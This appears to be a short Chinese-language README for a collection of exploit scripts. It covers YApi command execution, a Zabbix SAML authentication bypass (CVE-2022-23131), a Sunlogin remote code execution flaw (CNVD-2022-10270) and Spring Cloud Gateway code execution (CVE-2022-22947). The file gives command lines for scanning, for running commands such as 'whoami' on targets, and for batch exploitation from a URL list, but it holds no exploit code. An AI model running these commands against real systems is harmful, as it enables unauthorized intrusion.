vuln_script

漏洞脚本

Yapi远程命令执行漏洞.py

CVE-2022-23131 Zabbix SAML SSO认证绕过 CVE-2022-23131.py

python3 CVE-2022-23131.py -u http://127.0.0.1 -a Admin

向日葵存在命令执行漏洞(CNVD-2022-10270) sunlogin_rce.py

poc

python3 sunlogin_rce.py --scan -u 10.108.3.74

rce

python3 sunlogin_rce.py --rce -u 10.108.3.74 -p 21021

Spring Cloud Gateway 远程代码执行漏洞 CVE-2022-22947.py

单个验证

具体的参数请看使用说明 python3 CVE-2022-22947.py -h

python3 CVE-2022-22947.py -u http://10.108.0.52:8080 -x whoami

批量验证

python3 CVE-2022-22947.py -f url.txt